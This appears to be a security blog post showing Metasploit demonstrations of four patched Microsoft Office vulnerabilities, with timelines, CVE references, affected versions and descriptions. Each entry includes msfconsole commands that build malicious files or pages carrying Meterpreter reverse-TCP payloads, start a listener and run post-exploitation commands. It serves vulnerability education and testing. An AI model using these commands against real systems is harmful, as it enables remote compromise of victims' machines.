MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475” provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_exce­l_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI the 2007-03-19
Metasploit PoC provided by hdm the 2009-07-13
Milw0rm PoC provided by anonymous the 2009-07-16
Microsoft patch “KB947319” provided the 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msd­so
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-087 : Microsoft Office RTF Parsing Stack Overflow

Timeline :

Vulnerability discovered by wushi of team509
Initial Vendor Notification by iDefense the 2009-08-12
Initial Vendor Reply to iDefense the 2009-08-12
Coordinated Public Disclosure the 2010-11-09

    PoC provided by :

wushi of team509
unknown
jduck

    Reference(s) :

CVE-2010-3333
MS10-087

    Affected version(s) :

Microsoft Office XP Service Pack 3 before KB2289169
Microsoft Office 2003 Service Pack 3 before KB2289187
Microsoft Office 2007 Service Pack 2 before KB2289158
Microsoft Office 2010 (32-bit editions) before KB2289161
Microsoft Office 2010 (64-bit editions) before KB2289161
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac before KB2476512
Microsoft Office for Mac 2011before KB2454823
Open XML File Format Converter for Mac before KB2476511

    Tested on Windows XP SP3 with :

    Office 2003 SP3 msword.exe version 11.0.8328.0 (KB2344911 from 12 October 2010)

    Description :

This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.

    Commands :

use exploit/windows/fileformat/ms10_087_rtf_­pfragments_bof
set FILENAME test.rtf
set OUTPUTPATH /home/eromang
show targets
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig